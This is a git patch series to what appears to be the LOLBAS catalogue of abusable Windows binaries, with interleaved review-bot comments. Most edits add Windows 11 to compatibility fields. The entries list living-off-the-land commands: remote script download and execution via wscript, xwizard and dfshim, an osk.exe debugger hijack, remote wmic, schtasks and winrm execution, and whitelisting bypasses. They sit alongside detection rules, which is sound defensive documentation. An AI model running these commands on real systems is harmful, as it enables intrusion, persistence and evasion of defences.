@@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 4f3e5b5..a176de6 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,13 +11,13 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute Privileges: Administrator MitreID: T1053.005 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 41def89..73f8752 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml 
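Review bot: In the Schtasks.yml hunk the second command's `OperatingSystem: Windows` becomes `Windows 10, Windows 11`, which narrows the claim (Vista through 8.1 are no longer listed) rather than adding Windows 11, while the first command's `OperatingSystem: Windows` context line three lines above is left as is, so the two entries in the same file now disagree. Unless the remote-task form was actually verified to fail on older versions, `OperatingSystem: Windows, Windows 11` or the full version list used elsewhere in this patch would be consistent. The Advpack.yml and Shell32.yml hunks further down make the same `Windows` to `Windows 10, Windows 11` substitution. The removed and re-added `- Command: schtasks /create …` line looks identical in this view, so presumably only trailing whitespace changed.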
@@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..fdd8ef0 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index bf5280a..d4e5a4a 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.012 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index a3652cf..6015cda 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml 
@@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index f4271e9..ac38398 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml 
@@ -10,28 +10,28 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. Usecase: Execute binary with scheduled task created with wmic on a remote computer 
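Review bot: Appending `Windows 11` to every wmic.exe entry somewhat overstates availability: to my knowledge Microsoft has deprecated the WMIC utility and ships it only as an optional feature on newer Windows 11 builds, so the listed commands will not run, and detections keyed on wmic.exe will not fire, on hosts where it is absent. Consider qualifying the field, e.g. `Windows 11 (WMIC deprecated; optional feature on recent builds)`, or recording the deprecation under `Resources:` so defenders know not to rely on wmic.exe-based coverage alone. The second Wmic.yml hunk (`@@ -52,14 +52,14 @@`) has the same issue.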
@@ -52,14 +52,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..00b3f33 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index e24f33f..b1b8b54 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml 
@@ -10,14 +10,14 @@ Commands: Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe @@ -31,7 +31,7 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Wscript.exe executing code from alternate data streams - IOC: DotNet CLR libraries loaded into wscript.exe - IOC: DotNet CLR Usage Log - wscript.exe.log diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index fcab2d3..b8e8f0f 100644 
--- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -10,7 +10,7 @@ Commands: Category: UAC bypass Privileges: User MitreID: T1548.002 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wsreset.exe Code_Sample: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 8c01a73..082ce3b 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 5e75f3c..8ee42f4 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml 
@@ -10,35 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 7deb471..dd9b427 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml 
@@ -1,29 +1,29 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: -- Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: +- Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5d4b41d..ca4dd14 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml 
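Review bot: Every line of Dfshim.yml is removed and re-added although the only textual change is `, Windows 11` on the `OperatingSystem` line; presumably the file's line endings or BOM changed, which hides the real edit from `git blame` and makes review harder. Normalising line endings in a separate commit (or via a `.gitattributes` `* text=auto` rule) would keep this diff to one line. Since the whole file is on the new side: the `Full_Path:` entries for a `Dfshim.dll` entry all point at `Dfsvc.exe`; if that is intentional (the Description calls the rundll32 invocation a trampoline for Dfsvc.exe) a short note in `Resources:` would help readers, otherwise the DLL's own path belongs here — worth confirming.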
@@ -10,33 +10,35 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows, Windows 11 (!!!) - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows, Windows 11 (!!!) Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4ddf18e..bfd4dee 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml 
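Review bot: The five new `OperatingSystem: Windows, Windows 11 (!!!)` lines carry what looks like an author's placeholder marker; it will be rendered verbatim on the site and parsed into the OS field by any tooling that consumes these files. `Windows, Windows 11` is also redundant, since the unqualified `Windows` already covers 11. The sibling Advpack.yml hunk above uses `OperatingSystem: Windows 10, Windows 11`; matching it here (or keeping a plain `Windows` if older versions were not checked) and dropping the `(!!!)` keeps the two entries consistent. Adding the field to the two commands that previously lacked it is a good catch.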
@@ -10,19 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 945d373..85da874 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -4,13 +4,13 @@ Description: PowerShell Diagnostic Script Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + - Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' Description: Proxy execute Managed DLL with PowerShell Usecase: Execute proxied payload with Microsoft signed binary Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: 
diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index edf125c..f537aa8 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 4850278..587242c 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 67a1719..023d4e7 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml 
@@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location Usecase: Execute aribtrary, unsigned code via XSL script Category: AWL Bypass Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 7d525f8..842c3b3 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1216 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat From 6793a7d238b646dad0c21932360cd96a349aec3c Mon Sep 17 00:00:00 2001 
From: Wietze Date: Tue, 14 Dec 2021 16:50:22 +0000 Subject: [PATCH 03/11] Fixing various issues identified --- yml/OSBinaries/Cscript.yml | 2 +- yml/OSBinaries/Hh.yml | 3 +-- yml/OSBinaries/Infdefaultinstall.yml | 2 +- yml/OSBinaries/Netsh.yml | 2 +- yml/OSBinaries/Odbcconf.yml | 2 +- yml/OSBinaries/Regedit.yml | 3 +-- yml/OSBinaries/Regsvcs.yml | 8 ++++---- yml/OSBinaries/Rundll32.yml | 2 +- yml/OSBinaries/Vbc.yml | 10 +++++----- yml/OSBinaries/Wscript.yml | 2 +- yml/OSBinaries/Xwizard.yml | 2 +- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 12 ++++++------ yml/OSLibraries/Shell32.yml | 2 +- yml/OSScripts/CL_LoadAssembly.yml | 2 +- yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 4 ++-- 17 files changed, 30 insertions(+), 32 deletions(-) diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index c3fe1b4..2b84d9e 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - - Command: cscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 714425a..8cf43fd 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe + - Path: C:\Windows\hh.exe Code_Sample: - Code: Detection: diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index e28ba10..1ec76d5 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml 
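Review bot: The Hh.yml hunk replaces both the `System32` and `SysWOW64` paths with a single `C:\Windows\hh.exe`; I believe a 32-bit copy also exists at `C:\Windows\SysWOW64\hh.exe` on 64-bit installs, so dropping it narrows the coverage of any path-based detection derived from Full_Path — please confirm before removing it. The Regedit.yml hunk further down in this patch makes the same reduction to `C:\Windows\regedit.exe` only, and the same check applies there. Separately, the Cscript.yml hunk above leaves the context typo `exectute` in its Description unfixed, which would fit this commit's stated clean-up purpose.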
+++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -8,7 +8,7 @@ Commands: Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. Usecase: Code execution Category: Execute - Privileges: User + Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 969d433..87e70b9 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -8,7 +8,7 @@ Commands: Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute - Privileges: User + Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 07cd750..551c133 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -5,7 +5,7 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures Category: Execute Privileges: User diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3868fd5..b45a3c1 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -19,8 +19,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\regedit.exe - - Path: C:\Windows\SysWOW64\regedit.exe + - Path: C:\Windows\regedit.exe Code_Sample: - Code: Detection: 
